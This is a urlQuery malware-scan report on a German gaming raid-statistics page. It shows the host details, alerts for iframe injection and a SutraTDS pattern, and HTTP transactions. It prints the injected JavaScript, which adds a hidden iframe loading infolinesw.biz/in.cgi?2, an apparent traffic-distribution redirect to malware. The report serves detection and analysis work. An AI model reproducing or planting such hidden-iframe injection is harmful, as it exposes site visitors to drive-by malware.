Overview

URLhttp://raidstats.liebesbude.de/08_03_06_winterchill_kill
IP85.14.216.82
ASNAS13301 UNITED COLO GmbH
Location Germany
Report completed2012-11-13 15:45:21 CET
StatusLoading report..
urlQuery Alerts Detected malicious iframe injection
Detected SutraTDS URL pattern


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro No alerts detected
Snort /w Sourcefire VRT No alerts detected


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 85.14.216.82

Date Alerts / IDS URL IP
2012-11-21 16:41:232 / 0http://raidstats.liebesbude.de/dez_07/07_12_19_supremus_kill85.14.216.82
2012-11-21 16:37:542 / 0http://raidstats.liebesbude.de/oct_07/07_10_03_komplett85.14.216.82
2012-11-21 09:53:482 / 0http://raidstats.liebesbude.de/oct_07/07_10_03_komplett85.14.216.82
2012-11-21 09:45:152 / 0http://raidstats.liebesbude.de/dez_07/07_12_19_supremus_kill85.14.216.82
2012-11-18 16:53:072 / 0http://raidstats.liebesbude.de/08_02_20_akama_kill85.14.216.82
2012-11-18 00:27:562 / 0http://raidstats.liebesbude.de/08_02_20_akama_kill/85.14.216.82

Last 6 reports on ASN: AS13301 UNITED COLO GmbH

Date Alerts / IDS URL IP
2013-04-10 17:07:170 / 3http://funbot.funpic.org/x4x.exe213.202.225.32
2013-04-10 16:02:171 / 1http://yroctpjwm16.yr.funpic.de/samsungharddrive.html213.202.225.74
2013-04-10 15:56:260 / 1http://dernjchln22.de.funpic.de/flashingwomen.html213.202.225.52
2013-04-10 15:49:201 / 1http://mlpwvmjdc16.ml.funpic.de/laserprintersamsungtoner.html213.202.225.73
2013-04-10 15:48:370 / 1http://emmwatson.em.funpic.de/displayimage.php?album=random213.202.225.54
2013-04-10 15:48:150 / 1http://dernjchln22.de.funpic.de/co-edconfidential3free.html213.202.225.52

Last 6 reports on domain: raidstats.liebesbude.de

Date Alerts / IDS URL IP
2012-11-21 16:41:232 / 0http://raidstats.liebesbude.de/dez_07/07_12_19_supremus_kill85.14.216.82
2012-11-21 16:37:542 / 0http://raidstats.liebesbude.de/oct_07/07_10_03_komplett85.14.216.82
2012-11-21 09:53:482 / 0http://raidstats.liebesbude.de/oct_07/07_10_03_komplett85.14.216.82
2012-11-21 09:45:152 / 0http://raidstats.liebesbude.de/dez_07/07_12_19_supremus_kill85.14.216.82
2012-11-18 16:53:072 / 0http://raidstats.liebesbude.de/08_02_20_akama_kill85.14.216.82
2012-11-18 00:27:562 / 0http://raidstats.liebesbude.de/08_02_20_akama_kill/85.14.216.82



JavaScript

Executed Scripts (5)


Executed Evals (1)

#1 JavaScript::Eval (size: 561, repeated: 1) - Alert detect on script (Severity: 2)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://infolinesw.biz/in.cgi?2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://infolinesw.biz/in.cgi?2');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

Executed Writes (0)



HTTP Transactions (10)


Request Response 
GET /08_03_06_winterchill_kill HTTP/1.1

Host: raidstats.liebesbude.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 301 Moved Permanently

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 13 Nov 2012 15:07:12 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Location: http://raidstats.liebesbude.de/08_03_06_winterchill_kill/
Content-Length: 358
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /08_03_06_winterchill_kill/ HTTP/1.1

Host: raidstats.liebesbude.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 200 OK

Content-Type: text/html

Date: Tue, 13 Nov 2012 15:07:12 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Mon, 25 Jul 2011 08:43:22 GMT
Etag: &quot;3fe71-69bd-cec4fe80&quot;
Accept-Ranges: bytes
Content-Length: 27069
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
GET /08_03_06_winterchill_kill/custom.css HTTP/1.1

Host: raidstats.liebesbude.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/08_03_06_winterchill_kill/
 
HTTP/1.1 200 OK

Content-Type: text/css

Date: Tue, 13 Nov 2012 15:07:12 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Sat, 08 Mar 2008 13:21:12 GMT
Etag: &quot;3fe62-0-d8344200&quot;
Accept-Ranges: bytes
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /08_03_06_winterchill_kill/tooltip.js HTTP/1.1

Host: raidstats.liebesbude.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/08_03_06_winterchill_kill/
 
HTTP/1.1 200 OK

Content-Type: application/x-javascript

Date: Tue, 13 Nov 2012 15:07:12 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Sat, 08 Mar 2008 13:21:19 GMT
Etag: &quot;3fe86-40e-d89f11c0&quot;
Accept-Ranges: bytes
Content-Length: 1038
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /08_03_06_winterchill_kill/recap.css HTTP/1.1

Host: raidstats.liebesbude.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/08_03_06_winterchill_kill/
 
HTTP/1.1 200 OK

Content-Type: text/css

Date: Tue, 13 Nov 2012 15:07:12 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Sat, 08 Mar 2008 13:21:17 GMT
Etag: &quot;3fe7c-10f3-d8808d40&quot;
Accept-Ranges: bytes
Content-Length: 4339
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /08_03_06_winterchill_kill/rengine.js HTTP/1.1

Host: raidstats.liebesbude.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/08_03_06_winterchill_kill/
 
HTTP/1.1 200 OK

Content-Type: application/x-javascript

Date: Tue, 13 Nov 2012 15:07:12 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Sat, 08 Mar 2008 13:21:17 GMT
Etag: &quot;3fe7d-1150-d8808d40&quot;
Accept-Ranges: bytes
Content-Length: 4432
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /08_03_06_winterchill_kill/img/Help.gif HTTP/1.1

Host: raidstats.liebesbude.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/08_03_06_winterchill_kill/
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Tue, 13 Nov 2012 15:07:12 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Sat, 08 Mar 2008 13:21:08 GMT
Etag: &quot;3fe49-4af-d7f73900&quot;
Accept-Ranges: bytes
Content-Length: 1199
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: raidstats.liebesbude.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 13 Nov 2012 15:07:14 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Language: en
GET /favicon.ico HTTP/1.1

Host: raidstats.liebesbude.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 13 Nov 2012 15:07:17 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Language: en
GET /in.cgi?2 HTTP/1.1

Host: infolinesw.biz

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/08_03_06_winterchill_kill/